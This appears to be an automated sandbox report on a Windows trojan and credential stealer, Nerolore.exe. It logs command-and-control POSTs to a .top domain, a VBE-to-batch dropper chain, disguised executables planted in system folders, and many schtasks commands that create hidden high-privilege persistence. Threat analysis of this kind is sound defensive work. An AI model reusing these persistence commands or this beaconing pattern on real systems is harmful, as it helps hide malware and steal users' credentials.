                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global traffic DNS traffic detected: DNS query: 373292cm.nyashka.top
                              Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                              Source: unknown HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 373292cm.nyashka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://373292cm.nyPr8
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000028C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://373292cm.nyashka.top
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://373292cm.nyashka.top/
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.000000000293C000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.000000000287C000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000028C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                              Source: ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.enigmaprotector.com/
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.enigmaprotector.com/openU
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr String found in binary or memory: https://www.ecosia.org/newtab/
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe Window created: window name: CLIPBRDWNDCLASS

                              System Summary

                              Source: Nerolore.exe Static PE information: section name:
                              Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Source: C:\Users\user\Desktop\Nerolore.exe Code function: 0_2_04946856 NtQueryInformationProcess,GetSystemInfo,0_2_04946856
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: String function: 00FF6264 appears 97 times
                              Source: Nerolore.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Nerolore.exe
                              Source: Nerolore.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: ContainerAgentWinSession.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: NjWYKcLujkVoPzemFBeg.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: OfficeClickToRun.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: conhost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: NjWYKcLujkVoPzemFBeg.exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: NjWYKcLujkVoPzemFBeg.exe1.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: Nerolore.exeStatic PE information: Section: ZLIB complexity 0.9972673766816144
                              Source: Nerolore.exeStatic PE information: Section: ZLIB complexity 0.9949001736111112
                              Source: Nerolore.exeStatic PE information: Section: cheat ZLIB complexity 0.99721420469935
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@52/56@3/1
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\EmyZUDGW.logJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-2HbjMANWKVWdushT6pWo
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\AppData\Local\Temp\0mqt1et2Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" "
                              Source: C:\Users\user\Desktop\Nerolore.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: Nerolore.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\Nerolore.exe File read: C:\Windows\win.ini
                              Source: C:\Users\user\Desktop\Nerolore.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: 6Bmvgk9A3S.29.dr, aBpv6yHFBi.29.dr, TZCclynNgp.29.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: Nerolore.exeReversingLabs: Detection: 78%
                              Source: Nerolore.exeVirustotal: Detection: 66%
                              Source: C:\Users\user\Desktop\Nerolore.exe File read: C:\Users\user\Desktop\Nerolore.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\Nerolore.exe "C:\Users\user\Desktop\Nerolore.exe"
                              Source: C:\Users\user\Desktop\Nerolore.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe"
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" "
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\FontHost\ContainerAgentWinSession.exe "C:\FontHost/ContainerAgentWinSession.exe"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C21.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E35.tmp" "c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 11 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 10 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\ProgramData\dbg\conhost.exe "C:\Users\All Users\dbg\conhost.exe"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Source: unknownProcess created: C:\ProgramData\dbg\conhost.exe "C:\Users\All Users\dbg\conhost.exe"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ContainerAgentWinSession" /sc ONLOGON /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ContainerAgentWinSessionC" /sc MINUTE /mo 9 /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\FontHost\ContainerAgentWinSession.exe C:\FontHost\ContainerAgentWinSession.exe
                              Source: unknownProcess created: C:\FontHost\ContainerAgentWinSession.exe C:\FontHost\ContainerAgentWinSession.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\dbg\conhost.exe "C:\Users\All Users\dbg\conhost.exe"
                              Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: shfolder.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
                              Source: C:\Users\user\Desktop\Nerolore.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                              Source: C:\Users\user\Desktop\Nerolore.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: dxgidebug.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: riched20.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: usp10.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: msls31.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: version.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
